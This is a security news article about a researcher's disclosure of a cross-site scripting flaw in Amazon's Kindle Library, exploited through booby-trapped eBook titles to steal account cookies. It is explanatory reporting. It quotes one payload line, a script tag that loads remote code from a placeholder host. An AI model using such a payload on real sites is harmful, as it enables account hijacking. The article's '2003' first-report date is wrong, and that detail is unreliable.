Download this Kindle eBook, and have your Amazon account cookies stolen

A security researcher has reported what appears to be an embarrassing flaw on Amazon’s website that could put Kindle users at risk.

Benjamin Daniel Mussler claims that the “Manage Your Content and Devices” and “Manage Your Kindle” services on Amazon’s web-based Kindle Library are vulnerable to a cross-site scripting (XSS) attack, which can be exploited by a boobytrapped eBook title.

Anyone wanting to target a Kindle user would go about go about their attack by creating an eBook with a specially-crafted title:

<script src=”https://www.example.org/script.js”></script>

When the boobytrapped eBook is added to the intended victim’s library, the code will be automatically executed when the Kindle Library webpage is opened.

According to Mussler this means that “Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised”.

The good news is that you’re unlikely to find an eBook with a maliciously-crafted title in the official Kindle eBook store, provided Amazon keeps its eyes open. Instead, the only real chance that you might fall victim to the vulnerability is if you pirate eBooks, downloading them from dodgy sources and use Amazon’s “Send to Kindle” service to have them accessible on your reader.

The bad news, however, is that Mussler says he first reported the vulnerability to Amazon in November 2003 – along with an example eBook that ran proof-of-concept eBook that grabbed cookies and sent them to him. Amazon’s technical team managed to fix the flaw within four days. Most people would consider that a reasonable response, and a job well done… but there is more to this story.

To Mussler’s shock, the very same vulnerability was introduced approximately two months ago, and currently remains unfixed. The researcher informed Amazon that the security hole has re-emerged, but received no response from the company.

For that reason, Mussler has decided to go public with his findings and even published example code on his website that allows anyone to replicate the vulnerability.

Whether you think public disclosure of the vulnerability was the right approach or not is a matter of some debate. One thing is clear, however. Amazon needs to fix the security hole, even if it is only likely to be a risk for a small number of Kindle users, and fix it permanently.

In the meantime, Kindle users are advised to get their eBooks from official stores – just to be on the safe side…